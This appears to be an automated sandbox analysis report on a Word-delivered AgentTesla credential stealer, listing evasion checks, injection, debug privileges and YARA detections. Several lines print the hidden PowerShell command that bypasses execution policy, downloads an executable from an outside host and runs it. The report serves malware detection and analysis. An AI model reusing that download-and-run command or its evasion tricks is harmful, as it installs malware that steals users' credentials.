Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292	Thread sleep count: 302 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012	Thread sleep count: 9438 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep count: 101 > 30

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\okcff.exe

Window / User API: threadDelayed 9438

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 30000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\okcff.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects files into Windows application

Source: C:\Windows\System32\notepad.exe

Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Bypasses PowerShell execution policy

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\okcff.exe

Memory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2

Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\okcff.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

Yara detected Credential Stealer

Source: Yara match

File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
